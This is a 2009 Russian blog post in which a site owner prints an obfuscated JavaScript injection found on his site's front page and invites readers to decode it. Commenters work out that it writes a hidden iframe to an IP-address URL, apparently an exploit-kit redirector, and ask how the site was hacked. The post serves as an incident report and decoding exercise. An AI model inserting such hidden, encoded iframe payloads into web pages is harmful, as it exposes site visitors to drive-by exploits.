четверг, 28 мая 2009 г.

Троянчик

На одном из своих сайтов нашёл вставочку в титульную страницу:

eval(unescape("
%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30
%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E
%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));
d(unescape("%08<gocpdk-><%259lgffkj\"8{vknk`kqkt%25?gn{vq\"%253%25?vjekgj\"%253%25?jvfku\"%250=kea,lk-dpv-313,:5,303,120--8rvvj%25?apq\"gocpdk>"));

Молодёжи предлагаю потренироваться в расшифровке кода. В будущем - пригодится.

11 комментариев:

  1. Меняем eval на document.write и вуаля!

    ОтветитьУдалить
  2. Random, первую часть кода можно и в строку поиска яндекса запихнуть, он сделает декодирование. Это вообще фигня задачка. А вторую часть расшифровать - слабо?!

    ОтветитьУдалить
  3. Это всего лишь ифрейм на адресок 203.121.78.131/trf/in.cgi?2
    :)

    ОтветитьУдалить
  4. Анонимный29 мая, 2009 01:28

    Ну и не пойму.

    после функции d и join выходит ересь вида

    222222222222222221222032121272213122222222222222222222221222222222212222222222222222222122222221222222222222

    ОтветитьУдалить
  5. Неужели будущее такое хуевое? :)

    ОтветитьУдалить
  6. Расшифровать можно и тут http://www.artlebedev.ru/tools/decoder/advanced/

    ОтветитьУдалить
  7. Крылышкин, ты хоть сам пробовал или лишь бы отметится побыстрее в списке умных?

    ОтветитьУдалить
  8. а на каком двиге то все получилось ?
    как взломали, вот это важнее..

    ОтветитьУдалить
  9. wlad2, linux, видимо давно ломали, ещё в конце того года, не всё вычистил как оказалось.

    ОтветитьУдалить
  10. Ну так то, что там ифрейм с сутрой и сплойтом и так понятно было :) Я такое говно ещё давно у себя вычищал с фтпов.

    ОтветитьУдалить

Внимание! Все ссылки проходят фейс контроль. Все ссылки REL=NOFOLLOW. Удаляются все комментарии, кроме: анонимных или с ссылками на личные финансовые блоги.